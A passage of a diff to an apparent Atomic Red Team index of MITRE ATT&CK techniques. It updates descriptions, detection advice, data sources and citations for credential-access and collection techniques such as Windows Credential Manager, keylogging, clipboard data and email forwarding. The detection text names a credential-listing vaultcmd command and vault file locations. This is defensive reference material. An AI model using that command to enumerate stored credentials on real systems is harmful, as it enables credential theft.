managed by the Credential Manager and are stored in the Web Credentials locker. Application and network credentials are stored in the Windows Credentials locker. + + Credential Lockers store credentials in encrypted .vcrd files, located under %Systemdrive%\Users\\[Username]\AppData\Local\Microsoft\\[Vault/Credentials]\. The encryption key can be found in a file named Policy.vpol, typically located in the same folder as the credentials.(Citation: passcape Windows Vault)(Citation: Malwarebytes The Windows Vault) + + Adversaries may list credentials managed by the Windows Credential Manager through several mechanisms. vaultcmd.exe is a native Windows executable that can be used to enumerate credentials stored in the Credential Locker through a command-line interface. Adversaries may gather credentials by reading files located inside of the Credential Lockers. Adversaries may also abuse Windows APIs such as CredEnumerateA to list credentials managed by the Credential Manager.(Citation: Microsoft CredEnumerate)(Citation: Delpy Mimikatz Crendential Manager) + + Adversaries may use password recovery tools to obtain plain text passwords from the Credential Manager.(Citation: Malwarebytes The Windows Vault) + name: Windows Credential Manager + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + external_references: + - source_name: mitre-attack + external_id: T1555.004 + url: https://attack.mitre.org/techniques/T1555/004 + - source_name: Microsoft Credential Manager store + url: https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/hh994565(v=ws.11)#credential-manager-store + description: Microsoft. (2016, August 31). Cached and Stored Credentials Technical + Overview. Retrieved November 24, 2020. + - source_name: Microsoft Credential Locker + url: https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-8.1-and-8/jj554668(v=ws.11)?redirectedfrom=MSDN + description: Microsoft. (2013, October 23). Credential Locker Overview. Retrieved + November 24, 2020. + - source_name: passcape Windows Vault + url: https://www.passcape.com/windows_password_recovery_vault_explorer + description: Passcape. (n.d.). Windows Password Recovery - Vault Explorer + and Decoder. Retrieved November 24, 2020. + - source_name: Malwarebytes The Windows Vault + url: 'https://blog.malwarebytes.com/101/2016/01/the-windows-vaults/ ' + description: Arntz, P. (2016, March 30). The Windows Vault . Retrieved November + 23, 2020. + - source_name: Microsoft CredEnumerate + url: https://docs.microsoft.com/en-us/windows/win32/api/wincred/nf-wincred-credenumeratea + description: Microsoft. (2018, December 5). CredEnumarateA function (wincred.h). + Retrieved November 24, 2020. + - source_name: Delpy Mimikatz Crendential Manager + url: https://github.com/gentilkiwi/mimikatz/wiki/howto-~-credential-manager-saved-credentials + description: Delpy, B. (2017, December 12). howto ~ credential manager saved + credentials. Retrieved November 23, 2020. + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: credential-access + modified: '2021-04-29T21:00:18.973Z' + created: '2020-11-23T15:35:53.793Z' + x_mitre_platforms: + - Windows + x_mitre_contributors: + - Bernaldo Penas Antelo + - Mugdha Peter Bansode + x_mitre_data_sources: + - 'Process: Process Creation' + - 'Command: Command Execution' + - 'Process: OS API Execution' + - 'File: File Access' + x_mitre_detection: |- + Monitor process and command-line parameters of vaultcmd.exe for suspicious activity, such as listing credentials from the Windows Credentials locker (i.e., vaultcmd /listcreds:“Windows Credentials”).(Citation: Malwarebytes The Windows Vault) + + Consider monitoring API calls such as CredEnumerateA that may list credentials from the Windows Credential Manager.(Citation: Microsoft CredEnumerate)(Citation: Delpy Mimikatz Crendential Manager) + + Consider monitoring file reads to Vault locations, %Systemdrive%\Users\\[Username]\AppData\Local\Microsoft\\[Vault/Credentials]\, for suspicious activity.(Citation: Malwarebytes The Windows Vault) + x_mitre_permissions_required: + - User + x_mitre_is_subtechnique: true + x_mitre_version: '1.0' + atomic_tests: [] collection: T1557.002: technique: @@ -23326,7 +5664,7 @@ collection: - source_name: Cylance Cleaver description: Cylance. (2014, December). Operation Cleaver. Retrieved September 14, 2017. - url: https://www.cylance.com/content/dam/cylance/pages/operation-cleaver/Cylance_Operation_Cleaver_Report.pdf + url: https://web.archive.org/web/20200302085133/https://www.cylance.com/content/dam/cylance/pages/operation-cleaver/Cylance_Operation_Cleaver_Report.pdf object_marking_refs: - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 @@ -23348,7 +5686,7 @@ collection: phase_name: credential-access - kill_chain_name: mitre-attack phase_name: collection - modified: '2020-10-16T15:22:11.604Z' + modified: '2021-04-21T16:41:35.256Z' created: '2020-10-15T12:05:58.755Z' x_mitre_version: '1.0' x_mitre_is_subtechnique: true @@ -23360,8 +5698,8 @@ collection: map to a single MAC address, this could be an indicator that the ARP cache has been poisoned." x_mitre_data_sources: - - Packet capture - - Netflow/Enclave netflow + - 'Network Traffic: Network Traffic Content' + - 'Network Traffic: Network Traffic Flow' x_mitre_contributors: - Jon Sternstein, Stern Security x_mitre_platforms: @@ -23399,10 +5737,10 @@ collection: - macOS - Windows x_mitre_data_sources: - - Process monitoring - - Process command-line parameters - - File monitoring - - Binary file metadata + - 'Process: Process Creation' + - 'Command: Command Execution' + - 'File: File Creation' + - 'Script: Script Execution' x_mitre_detection: |- Archival software and archived files can be detected in many ways. Common utilities that may be present on the system or brought in by an adversary may be detectable through process monitoring and monitoring for command-line arguments for known archival utilities. This may yield a significant number of benign events, depending on how systems in the environment are typically used. @@ -23473,6 +5811,9 @@ collection: operations. x_mitre_is_subtechnique: true x_mitre_version: '1.0' + x_mitre_data_sources: + - 'File: File Creation' + - 'Script: Script Execution' atomic_tests: [] T1560.002: technique: @@ -23516,8 +5857,8 @@ collection: Consider detecting writing of files with extensions and/or headers associated with compressed or encrypted file types. Detection efforts may focus on follow-on exfiltration activity, where compressed or encrypted files can be detected in transit with a network intrusion detection or data loss prevention system analyzing file headers.(Citation: Wikipedia File Header Signatures) x_mitre_data_sources: - - Process monitoring - - Process command-line parameters + - 'File: File Creation' + - 'Script: Script Execution' x_mitre_platforms: - Linux - macOS @@ -23700,10 +6041,9 @@ collection: - macOS - Windows x_mitre_data_sources: - - Process monitoring - - Process command-line parameters - - File monitoring - - Binary file metadata + - 'Process: Process Creation' + - 'Command: Command Execution' + - 'File: File Creation' x_mitre_detection: |- Common utilities that may be present on the system or brought in by an adversary may be detectable through process monitoring and monitoring for command-line arguments for known archival utilities. This may yield a significant number of benign events, depending on how systems in the environment are typically used. @@ -24063,9 +6403,8 @@ collection: Behavior that could indicate technique use include an unknown or unusual process accessing APIs associated with devices or software that interact with the microphone, recording devices, or recording software, and a process periodically writing files to disk that contain audio data. x_mitre_data_sources: - - API monitoring - - Process monitoring - - File monitoring + - 'Process: OS API Execution' + - 'Command: Command Execution' x_mitre_version: '1.0' identifier: T1123 atomic_tests: @@ -24081,12 +6420,15 @@ collection: name: powershell T1119: technique: - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - external_references: - - source_name: mitre-attack - url: https://attack.mitre.org/techniques/T1119 - external_id: T1119 + created: '2017-05-31T21:31:27.985Z' + modified: '2020-03-31T22:18:43.019Z' + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: collection + type: attack-pattern + id: attack-pattern--30208d3e-0d6b-43c8-883e-44462a514619 + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + name: Automated Collection description: "Once established within a system or network, an adversary may use automated techniques for collecting internal data. Methods for performing this technique could include use of a [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059) @@ -24096,21 +6438,20 @@ collection: of other techniques such as [File and Directory Discovery](https://attack.mitre.org/techniques/T1083) and [Lateral Tool Transfer](https://attack.mitre.org/techniques/T1570) to identify and move files." - name: Automated Collection - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - id: attack-pattern--30208d3e-0d6b-43c8-883e-44462a514619 - type: attack-pattern - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: collection - modified: '2020-03-31T22:18:43.019Z' - created: '2017-05-31T21:31:27.985Z' - x_mitre_is_subtechnique: false - x_mitre_version: '1.0' - x_mitre_data_sources: - - File monitoring - - Data loss prevention - - Process command-line parameters + external_references: + - source_name: mitre-attack + url: https://attack.mitre.org/techniques/T1119 + external_id: T1119 + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + x_mitre_system_requirements: + - Permissions to access directories and files that store information of interest. + x_mitre_platforms: + - Linux + - macOS + - Windows + x_mitre_permissions_required: + - User x_mitre_detection: Depending on the method used, actions could include common file system commands and parameters on the command-line interface within batch files or scripts. A sequence of actions like this may be unusual, depending @@ -24123,14 +6464,12 @@ collection: API to gather data. Data may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001). - x_mitre_permissions_required: - - User - x_mitre_platforms: - - Linux - - macOS - - Windows - x_mitre_system_requirements: - - Permissions to access directories and files that store information of interest. + x_mitre_data_sources: + - 'File: File Access' + - 'Command: Command Execution' + - 'Script: Script Execution' + x_mitre_version: '1.0' + x_mitre_is_subtechnique: false identifier: T1119 atomic_tests: - name: Automated Collection Command Prompt @@ -24203,14 +6542,14 @@ collection: name: command_prompt T1115: technique: - id: attack-pattern--30973a08-aed9-4edf-8604-9084ce1b5c4f - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - name: Clipboard Data - description: "Adversaries may collect data stored in the clipboard from users - copying information within or between applications. \n\nIn Windows, Applications - can access clipboard data by using the Windows API.(Citation: MSDN Clipboard) - OSX provides a native command, pbpaste, to grab clipboard contents.(Citation: - Operating with EmPyre)" + created: '2017-05-31T21:31:25.967Z' + modified: '2020-04-23T18:35:58.230Z' + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: collection + type: attack-pattern + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 external_references: - source_name: mitre-attack external_id: T1115 @@ -24225,26 +6564,27 @@ collection: description: rvrsh3ll. (2016, May 18). Operating with EmPyre. Retrieved July 12, 2017. source_name: Operating with EmPyre - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - type: attack-pattern - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: collection - modified: '2020-04-23T18:35:58.230Z' - created: '2017-05-31T21:31:25.967Z' - x_mitre_is_subtechnique: false - x_mitre_platforms: - - Linux - - Windows - - macOS + description: "Adversaries may collect data stored in the clipboard from users + copying information within or between applications. \n\nIn Windows, Applications + can access clipboard data by using the Windows API.(Citation: MSDN Clipboard) + OSX provides a native command, pbpaste, to grab clipboard contents.(Citation: + Operating with EmPyre)" + name: Clipboard Data + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + id: attack-pattern--30973a08-aed9-4edf-8604-9084ce1b5c4f + x_mitre_version: '1.1' + x_mitre_data_sources: + - 'Process: OS API Execution' + - 'Command: Command Execution' x_mitre_detection: Access to the clipboard is a legitimate function of many applications on an operating system. If an organization chooses to monitor for this behavior, then the data will likely need to be correlated against other suspicious or non-user-driven activity. - x_mitre_data_sources: - - API monitoring - x_mitre_version: '1.1' + x_mitre_platforms: + - Linux + - Windows + - macOS + x_mitre_is_subtechnique: false identifier: T1115 atomic_tests: - name: Utilize Clipboard to store or execute commands from @@ -24367,8 +6707,8 @@ collection: User access logging within Atlassian's Confluence can be configured to report access to certain pages and documents through AccessLogFilter. (Citation: Atlassian Confluence Logging) Additional log storage and analysis infrastructure will likely be required for more robust detection capabilities. x_mitre_data_sources: - - Third-party application logs - - Authentication logs + - 'Logon Session: Logon Session Creation' + - 'Application Log: Application Log Content' x_mitre_platforms: - SaaS atomic_tests: [] @@ -24389,7 +6729,7 @@ collection: description: 'Hosseini, A. (2017, July 18). Ten Process Injection Techniques: A Technical Survey Of Common And Trending Process Injection Techniques. Retrieved December 7, 2017.' - source_name: Endgame Process Injection July 2017 + source_name: Elastic Process Injection July 2017 - url: https://www.adlice.com/userland-rootkits-part-1-iat-hooks/ description: 'Tigzy. (2014, October 15). Userland Rootkits: Part 1, IAT hooks. Retrieved December 12, 2017.' @@ -24439,9 +6779,9 @@ collection: description: | Adversaries may hook into Windows application programming interface (API) functions to collect user credentials. Malicious hooking mechanisms may capture API calls that include parameters that reveal user authentication credentials.(Citation: Microsoft TrojanSpy:Win32/Ursnif.gen!I Sept 2017) Unlike [Keylogging](https://attack.mitre.org/techniques/T1056/001), this technique focuses specifically on API functions that include parameters that reveal user credentials. Hooking involves redirecting calls to these functions and can be implemented via: - * **Hooks procedures**, which intercept and execute designated code in response to events such as messages, keystrokes, and mouse inputs.(Citation: Microsoft Hook Overview)(Citation: Endgame Process Injection July 2017) - * **Import address table (IAT) hooking**, which use modifications to a process’s IAT, where pointers to imported API functions are stored.(Citation: Endgame Process Injection July 2017)(Citation: Adlice Software IAT Hooks Oct 2014)(Citation: MWRInfoSecurity Dynamic Hooking 2015) - * **Inline hooking**, which overwrites the first bytes in an API function to redirect code flow.(Citation: Endgame Process Injection July 2017)(Citation: HighTech Bridge Inline Hooking Sept 2011)(Citation: MWRInfoSecurity Dynamic Hooking 2015) + * **Hooks procedures**, which intercept and execute designated code in response to events such as messages, keystrokes, and mouse inputs.(Citation: Microsoft Hook Overview)(Citation: Elastic Process Injection July 2017) + * **Import address table (IAT) hooking**, which use modifications to a process’s IAT, where pointers to imported API functions are stored.(Citation: Elastic Process Injection July 2017)(Citation: Adlice Software IAT Hooks Oct 2014)(Citation: MWRInfoSecurity Dynamic Hooking 2015) + * **Inline hooking**, which overwrites the first bytes in an API function to redirect code flow.(Citation: Elastic Process Injection July 2017)(Citation: HighTech Bridge Inline Hooking Sept 2011)(Citation: MWRInfoSecurity Dynamic Hooking 2015) id: attack-pattern--f5946b5e-9408-485f-a7f7-b5efc88909b6 type: attack-pattern kill_chain_phases: @@ -24449,15 +6789,11 @@ collection: phase_name: collection - kill_chain_name: mitre-attack phase_name: credential-access - modified: '2020-03-24T21:29:13.565Z' + modified: '2020-11-10T18:29:31.138Z' created: '2020-02-11T19:01:15.930Z' x_mitre_data_sources: - - Windows event logs - - Process monitoring - - Loaded DLLs - - DLL monitoring - - Binary file metadata - - API monitoring + - 'Process: OS API Execution' + - 'Process: Process Metadata' x_mitre_permissions_required: - Administrator - SYSTEM @@ -24535,42 +6871,35 @@ collection: kill_chain_phases: - kill_chain_name: mitre-attack phase_name: collection - modified: '2020-09-14T19:48:08.180Z' + modified: '2021-03-08T10:33:00.855Z' created: '2017-05-31T21:30:58.938Z' x_mitre_is_subtechnique: false x_mitre_contributors: - Praetorian - Shane Tully, @securitygypsy x_mitre_platforms: + - Windows + - IaaS - Linux - macOS - - Windows - - AWS - - GCP - - Azure x_mitre_detection: |- Processes that appear to be reading files from disparate locations and writing them to the same directory or file may be an indication of data being staged, especially if they are suspected of performing encryption or compression on the files, such as 7zip, RAR, ZIP, or zlib. Monitor publicly writeable directories, central locations, and commonly used staging directories (recycle bin, temp folders, etc.) to regularly check for compressed or encrypted data that may be indicative of staging. Monitor processes and command-line arguments for actions that could be taken to collect and combine files. Remote access tools with built-in features may interact directly with the Windows API to gather and copy to a location. Data may also be acquired and staged through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001). x_mitre_data_sources: - - File monitoring - - Process monitoring - - Process command-line parameters - x_mitre_version: '1.2' + - 'File: File Access' + - 'File: File Creation' + - 'Command: Command Execution' + x_mitre_version: '1.3' atomic_tests: [] T1530: technique: - id: attack-pattern--3298ce88-1628-43b1-87d9-0b5336b193d7 - description: |- - Adversaries may access data objects from improperly secured cloud storage. - - Many cloud service providers offer solutions for online data storage such as Amazon S3, Azure Storage, and Google Cloud Storage. These solutions differ from other storage solutions (such as SQL or Elasticsearch) in that there is no overarching application. Data from these solutions can be retrieved directly using the cloud provider's APIs. Solution providers typically offer security guides to help end users configure systems.(Citation: Amazon S3 Security, 2019)(Citation: Microsoft Azure Storage Security, 2019)(Citation: Google Cloud Storage Best Practices, 2019) - - Misconfiguration by end users is a common problem. There have been numerous incidents where cloud storage has been improperly secured (typically by unintentionally allowing public access by unauthenticated users or overly-broad access by all users), allowing open access to credit cards, personally identifiable information, medical records, and other sensitive information.(Citation: Trend Micro S3 Exposed PII, 2017)(Citation: Wired Magecart S3 Buckets, 2019)(Citation: HIPAA Journal S3 Breach, 2017) Adversaries may also obtain leaked credentials in source repositories, logs, or other means as a way to gain access to cloud storage objects that have access permission controls. - name: Data from Cloud Storage Object - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + created: '2019-08-30T18:07:27.741Z' + modified: '2021-03-08T10:33:01.374Z' + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: collection + type: attack-pattern external_references: - external_id: T1530 source_name: mitre-attack @@ -24599,33 +6928,34 @@ collection: url: https://www.hipaajournal.com/47gb-medical-records-unsecured-amazon-s3-bucket/ description: HIPAA Journal. (2017, October 11). 47GB of Medical Records and Test Results Found in Unsecured Amazon S3 Bucket. Retrieved October 4, 2019. - type: attack-pattern - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: collection - modified: '2020-07-09T14:02:05.276Z' - created: '2019-08-30T18:07:27.741Z' - x_mitre_is_subtechnique: false - x_mitre_platforms: - - AWS - - GCP - - Azure - x_mitre_version: '1.0' - x_mitre_contributors: - - Netskope - - Praetorian + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + name: Data from Cloud Storage Object + description: |- + Adversaries may access data objects from improperly secured cloud storage. + + Many cloud service providers offer solutions for online data storage such as Amazon S3, Azure Storage, and Google Cloud Storage. These solutions differ from other storage solutions (such as SQL or Elasticsearch) in that there is no overarching application. Data from these solutions can be retrieved directly using the cloud provider's APIs. Solution providers typically offer security guides to help end users configure systems.(Citation: Amazon S3 Security, 2019)(Citation: Microsoft Azure Storage Security, 2019)(Citation: Google Cloud Storage Best Practices, 2019) + + Misconfiguration by end users is a common problem. There have been numerous incidents where cloud storage has been improperly secured (typically by unintentionally allowing public access by unauthenticated users or overly-broad access by all users), allowing open access to credit cards, personally identifiable information, medical records, and other sensitive information.(Citation: Trend Micro S3 Exposed PII, 2017)(Citation: Wired Magecart S3 Buckets, 2019)(Citation: HIPAA Journal S3 Breach, 2017) Adversaries may also obtain leaked credentials in source repositories, logs, or other means as a way to gain access to cloud storage objects that have access permission controls. + id: attack-pattern--3298ce88-1628-43b1-87d9-0b5336b193d7 + x_mitre_permissions_required: + - User + x_mitre_data_sources: + - 'Cloud Storage: Cloud Storage Access' x_mitre_detection: Monitor for unusual queries to the cloud provider's storage service. Activity originating from unexpected sources may indicate improper permissions are set that is allowing access to data. Additionally, detecting failed attempts by a user for a certain object, followed by escalation of privileges by the same user, and access to the same object may be an indication of suspicious activity. - x_mitre_data_sources: - - Stackdriver logs - - Azure activity logs - - AWS CloudTrail logs - x_mitre_permissions_required: - - User + x_mitre_contributors: + - Netskope + - Praetorian + x_mitre_version: '1.1' + x_mitre_platforms: + - IaaS + x_mitre_is_subtechnique: false atomic_tests: [] T1602: technique: @@ -24663,9 +6993,8 @@ collection: modified: '2020-10-22T02:26:44.566Z' created: '2020-10-19T23:46:13.931Z' x_mitre_data_sources: - - Netflow/Enclave netflow - - Network protocol analysis - - Packet capture + - 'Network Traffic: Network Connection Creation' + - 'Network Traffic: Network Traffic Content' x_mitre_version: '1.0' x_mitre_is_subtechnique: false x_mitre_permissions_required: @@ -24714,19 +7043,16 @@ collection: kill_chain_phases: - kill_chain_name: mitre-attack phase_name: collection - modified: '2020-10-12T12:16:55.085Z' + modified: '2021-04-14T14:16:12.151Z' created: '2018-04-18T17:59:24.739Z' x_mitre_is_subtechnique: false - x_mitre_version: '3.0' + x_mitre_version: '3.1' x_mitre_contributors: - Praetorian - Milos Stojadinovic x_mitre_data_sources: - - OAuth audit logs - - Application logs - - Authentication logs - - Data loss prevention - - Third-party application logs + - 'Logon Session: Logon Session Creation' + - 'Application Log: Application Log Content' x_mitre_detection: |- As information repositories generally have a considerably large user base, detection of malicious use can be non-trivial. At minimum, access to information repositories performed by privileged users (for example, Active Directory Domain, Enterprise, or Schema Administrators) should be closely monitored and alerted upon, as these types of accounts should not generally used to access information repositories. If the capability exists, it may be of value to monitor and alert on users that are retrieving and viewing a large number of documents and pages; this behavior may be indicative of programmatic means being used to retrieve all data within the repository. In environments with high-maturity, it may be possible to leverage User-Behavioral Analytics (UBA) platforms to detect and alert on user based anomalies. @@ -24739,6 +7065,7 @@ collection: - macOS - SaaS - Office 365 + - Google Workspace atomic_tests: [] T1005: technique: @@ -24763,9 +7090,8 @@ collection: id: attack-pattern--3c4a2599-71ee-4405-ba1e-0e28414b4bc5 x_mitre_version: '1.2' x_mitre_data_sources: - - File monitoring - - Process monitoring - - Process command-line parameters + - 'File: File Access' + - 'Command: Command Execution' x_mitre_detection: Monitor processes and command-line arguments for actions that could be taken to collect files from a system. Remote access tools with built-in features may interact directly with the Windows API to gather data. @@ -24820,16 +7146,25 @@ collection: as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001). x_mitre_data_sources: - - File monitoring - - Process monitoring - - Process command-line parameters + - 'File: File Access' + - 'Network Share: Network Share Access' + - 'Command: Command Execution' x_mitre_version: '1.2' atomic_tests: [] T1025: technique: - id: attack-pattern--1b7ba276-eedc-4951-a762-0ceea2c030ec - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - name: Data from Removable Media + created: '2017-05-31T21:30:31.584Z' + modified: '2020-03-24T15:44:46.584Z' + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: collection + type: attack-pattern + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + external_references: + - source_name: mitre-attack + url: https://attack.mitre.org/techniques/T1025 + external_id: T1025 description: "Adversaries may search connected removable media on computers they have compromised to find files of interest. Sensitive data can be collected from any removable media (optical disk drive, USB memory, etc.) connected @@ -24837,36 +7172,26 @@ collection: may be in use, and common functionality within [cmd](https://attack.mitre.org/software/S0106) may be used to gather information. \n\nSome adversaries may also use [Automated Collection](https://attack.mitre.org/techniques/T1119) on removable media." - external_references: - - source_name: mitre-attack - url: https://attack.mitre.org/techniques/T1025 - external_id: T1025 - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - type: attack-pattern - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: collection - modified: '2020-03-24T15:44:46.584Z' - created: '2017-05-31T21:30:31.584Z' - x_mitre_is_subtechnique: false - x_mitre_platforms: - - Linux - - macOS - - Windows - x_mitre_system_requirements: - - Privileges to access removable media drive and files + name: Data from Removable Media + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + id: attack-pattern--1b7ba276-eedc-4951-a762-0ceea2c030ec + x_mitre_version: '1.1' + x_mitre_data_sources: + - 'File: File Access' + - 'Command: Command Execution' x_mitre_detection: Monitor processes and command-line arguments for actions that could be taken to collect files from a system's connected removable media. Remote access tools with built-in features may interact directly with the Windows API to gather data. Data may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001). - x_mitre_data_sources: - - File monitoring - - Process monitoring - - Process command-line parameters - x_mitre_version: '1.1' + x_mitre_system_requirements: + - Privileges to access removable media drive and files + x_mitre_platforms: + - Linux + - macOS + - Windows + x_mitre_is_subtechnique: false atomic_tests: [] T1114: technique: @@ -24891,7 +7216,7 @@ collection: kill_chain_phases: - kill_chain_name: mitre-attack phase_name: collection - modified: '2020-03-24T18:31:06.417Z' + modified: '2021-04-14T14:22:44.435Z' created: '2017-05-31T21:31:25.454Z' x_mitre_contributors: - Swetha Prabakaran, Microsoft Threat Intelligence Center (MSTIC) @@ -24901,6 +7226,7 @@ collection: x_mitre_platforms: - Windows - Office 365 + - Google Workspace x_mitre_detection: |- There are likely a variety of ways an adversary could collect email from a target, each with a different mechanism for detection. @@ -24912,14 +7238,12 @@ collection: Auto-forwarded messages generally contain specific detectable artifacts that may be present in the header; such artifacts would be platform-specific. Examples include X-MS-Exchange-Organization-AutoForwarded set to true, X-MailFwdBy and X-Forwarded-To. The forwardingSMTPAddress parameter used in a forwarding process that is managed by administrators and not by user actions. All messages for the mailbox are forwarded to the specified SMTP address. However, unlike typical client-side rules, the message does not appear as forwarded in the mailbox; it appears as if it were sent directly to the specified destination mailbox.(Citation: Microsoft Tim McMichael Exchange Mail Forwarding 2) High volumes of emails that bear the X-MS-Exchange-Organization-AutoForwarded header (indicating auto-forwarding) without a corresponding number of emails that match the appearance of a forwarded message may indicate that further investigation is needed at the administrator level rather than user-level. x_mitre_data_sources: - - Office 365 trace logs - - Mail server - - Email gateway - - Authentication logs - - File monitoring - - Process monitoring - - Process use of network - x_mitre_version: '2.1' + - 'File: File Access' + - 'Network Traffic: Network Connection Creation' + - 'Logon Session: Logon Session Creation' + - 'Command: Command Execution' + - 'Application Log: Application Log Content' + x_mitre_version: '2.2' atomic_tests: [] T1114.003: technique: @@ -24945,24 +7269,25 @@ collection: or the victim’s organization to use as part of further exploits or operations.(Citation: US-CERT TA18-068A 2018) Outlook and Outlook Web App (OWA) allow users to create inbox rules for various email functions, including forwarding to a different - recipient. Messages can be forwarded to internal or external recipients, and - there are no restrictions limiting the extent of this rule. Administrators - may also create forwarding rules for user accounts with the same considerations - and outcomes.(Citation: Microsoft Tim McMichael Exchange Mail Forwarding 2) - \n\nAny user or administrator within the organization (or adversary with valid - credentials) can create rules to automatically forward all received messages - to another recipient, forward emails to different locations based on the sender, - and more." + recipient. Similarly, Google Workspace users or administrators can set up + mail forwarding rules via the Google Workspace web interface. Messages can + be forwarded to internal or external recipients, and there are no restrictions + limiting the extent of this rule. Administrators may also create forwarding + rules for user accounts with the same considerations and outcomes.(Citation: + Microsoft Tim McMichael Exchange Mail Forwarding 2) \n\nAny user or administrator + within the organization (or adversary with valid credentials) can create rules + to automatically forward all received messages to another recipient, forward + emails to different locations based on the sender, and more." id: attack-pattern--7d77a07d-02fe-4e88-8bd9-e9c008c01bf0 type: attack-pattern kill_chain_phases: - kill_chain_name: mitre-attack phase_name: collection - modified: '2020-10-19T22:43:45.509Z' + modified: '2021-03-25T13:08:30.699Z' created: '2020-02-19T18:54:47.103Z' x_mitre_contributors: - Swetha Prabakaran, Microsoft Threat Intelligence Center (MSTIC) - x_mitre_version: '1.0' + x_mitre_version: '1.1' x_mitre_is_subtechnique: true x_mitre_permissions_required: - User @@ -24971,14 +7296,11 @@ collection: Auto-forwarded messages generally contain specific detectable artifacts that may be present in the header; such artifacts would be platform-specific. Examples include `X-MS-Exchange-Organization-AutoForwarded` set to true, `X-MailFwdBy` and `X-Forwarded-To`. The `forwardingSMTPAddress` parameter used in a forwarding process that is managed by administrators and not by user actions. All messages for the mailbox are forwarded to the specified SMTP address. However, unlike typical client-side rules, the message does not appear as forwarded in the mailbox; it appears as if it were sent directly to the specified destination mailbox.(Citation: Microsoft Tim McMichael Exchange Mail Forwarding 2) High volumes of emails that bear the `X-MS-Exchange-Organization-AutoForwarded` header (indicating auto-forwarding) without a corresponding number of emails that match the appearance of a forwarded message may indicate that further investigation is needed at the administrator level rather than user-level. x_mitre_data_sources: - - Process use of network - - Process monitoring - - Email gateway - - Mail server - - Office 365 trace logs + - 'Application Log: Application Log Content' x_mitre_platforms: - Office 365 - Windows + - Google Workspace atomic_tests: [] T1056.002: technique: @@ -25035,10 +7357,7 @@ collection: x_mitre_contributors: - Matthew Molyett, @s1air, Cisco Talos x_mitre_data_sources: - - PowerShell logs - - User interface - - Process command-line parameters - - Process monitoring + - 'Process: Process Creation' x_mitre_permissions_required: - User x_mitre_detection: |- @@ -25121,17 +7440,12 @@ collection: x_mitre_contributors: - John Lambert, Microsoft Threat Intelligence Center x_mitre_data_sources: - - Windows Registry - - Windows event logs - - User interface - - Process command-line parameters - - Process monitoring - - PowerShell logs - - Loaded DLLs - - Kernel drivers - - DLL monitoring - - Binary file metadata - - API monitoring + - 'Windows Registry: Windows Registry Key Modification' + - 'Driver: Driver Load' + - 'Process: OS API Execution' + - 'Process: Process Creation' + - 'File: File Modification' + - 'Process: Process Metadata' x_mitre_detection: 'Detection may vary depending on how input is captured but may include monitoring for certain Windows API calls (e.g. `SetWindowsHook`, `GetKeyState`, and `GetAsyncKeyState`)(Citation: Adventures of a Keystroke), @@ -25152,26 +7466,14 @@ collection: atomic_tests: [] T1056.001: technique: - id: attack-pattern--09a60ea3-a8d1-4ae5-976e-5783248b72a4 - description: "Adversaries may log user keystrokes to intercept credentials as - the user types them. Keylogging is likely to be used to acquire credentials - for new access opportunities when [OS Credential Dumping](https://attack.mitre.org/techniques/T1003) - efforts are not effective, and may require an adversary to intercept keystrokes - on a system for a substantial period of time before credentials can be successfully - captured.\n\nKeylogging is the most prevalent type of input capture, with - many different ways of intercepting keystrokes.(Citation: Adventures of a - Keystroke) Some methods include:\n\n* Hooking API callbacks used for processing - keystrokes. Unlike [Credential API Hooking](https://attack.mitre.org/techniques/T1056/004), - this focuses solely on API functions intended for processing keystroke data.\n* - Reading raw keystroke data from the hardware buffer.\n* Windows Registry modifications.\n* - Custom drivers.\n* [Modify System Image](https://attack.mitre.org/techniques/T1601) - may provide adversaries with hooks into the operating system of network devices - to read raw keystrokes for login sessions.(Citation: Cisco Blog Legacy Device - Attacks) " - name: Keylogging - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - object_marking_refs: - - 